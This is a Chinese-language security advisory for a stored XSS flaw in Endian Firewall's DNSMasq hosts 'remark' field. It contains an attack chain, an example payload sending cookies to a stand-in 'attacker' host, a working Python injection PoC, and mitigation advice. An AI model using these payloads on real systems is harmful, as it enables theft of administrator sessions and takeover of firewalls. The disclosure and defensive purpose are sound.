CVE-2026-34799 CVSS 6.4 中危

CVE-2026-34799 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34799

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25及之前版本在`/manage/dnsmasq/hosts/`接口的`remark`参数中存在存储型跨站脚本（XSS）漏洞。由于系统未对用户输入做充分过滤，经过身份验证的攻击者可注入恶意JavaScript。当其他用户浏览该页面时，恶意脚本将在其浏览器上下文中执行，可能导致账户劫持或信息泄露。

技术细节

该漏洞属于典型的存储型跨站脚本攻击（Stored XSS）。漏洞根因在于Endian Firewall在处理DNSSMasq主机配置保存逻辑时，未对`remark`参数进行严格的输入验证和HTML实体编码。攻击者首先需要获取一个低权限的账户凭证登录系统。随后，攻击者构造特制的HTTP POST请求发送至`/manage/dnsmasq/hosts/`，在`remark`字段中植入JavaScript Payload（例如：`<script>fetch('http://attacker/?c='+document.cookie)</script>`）。该Payload被持久化存储在后台数据库中。一旦拥有更高权限的管理员用户访问该管理页面以查看主机列表，后端应用会直接将未经过滤的`remark`内容回显至前端HTML中，导致恶意脚本在管理员浏览器中自动执行。利用此漏洞，攻击者可窃取Session ID、绕过同源策略限制，甚至以管理员身份执行未授权操作。

攻击链分析

STEP 1

reconnaissance

攻击者识别目标为Endian防火墙，并确认版本在3.3.25及以下。

STEP 2

Initial Access

攻击者使用获取到的低权限账户登录到Web管理界面。

STEP 3

Exploitation

攻击者向`/manage/dnsmasq/hosts/`发送POST请求，在`remark`参数中注入恶意JavaScript代码。

STEP 4

Persistence

恶意Payload被存储在数据库中，每次加载该页面时都会被检索。

STEP 5

Execution

当管理员或其他用户访问受影响的管理页面时，恶意脚本在受害者的浏览器中执行。

STEP 6

Impact

攻击者窃取管理员的Session Cookie，进而接管管理员账户或执行恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "https://<target-ip>/manage/dnsmasq/hosts/"

# Authentication cookies (required as PR:L)
cookies = {
    "sessionid": "valid_low_privilege_session_cookie"
}

# Malicious XSS payload to be stored in the remark field
xss_payload = '"><script>alert(document.cookie);</script>'

# Form data required to create a host entry
# Adjust 'ip' and 'mac' according to the target network configuration
data_payload = {
    "ip": "192.168.1.222",
    "mac": "00:AA:BB:CC:DD:EE",
    "remark": xss_payload,
    "action": "create"
}

try:
    # Send POST request to inject the payload
    response = requests.post(target_url, data=data_payload, cookies=cookies, verify=False, timeout=10)

    if response.status_code == 200:
        print("[+] Payload injected successfully.")
        print("[+] The XSS trigger will execute when an admin views the DNSSMasq hosts page.")
    else:
        print(f"[-] Injection failed. Status code: {response.status_code}")
        print(response.text)

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

在官方修复补丁发布前，建议管理员严格限制对防火墙Web管理界面的网络访问，仅允许来自受信任内部IP的连接。同时，加强日志审计，监控DNSSMasq主机配置中是否存在异常的脚本字符。建议临时禁用低权限用户修改主机备注信息的功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表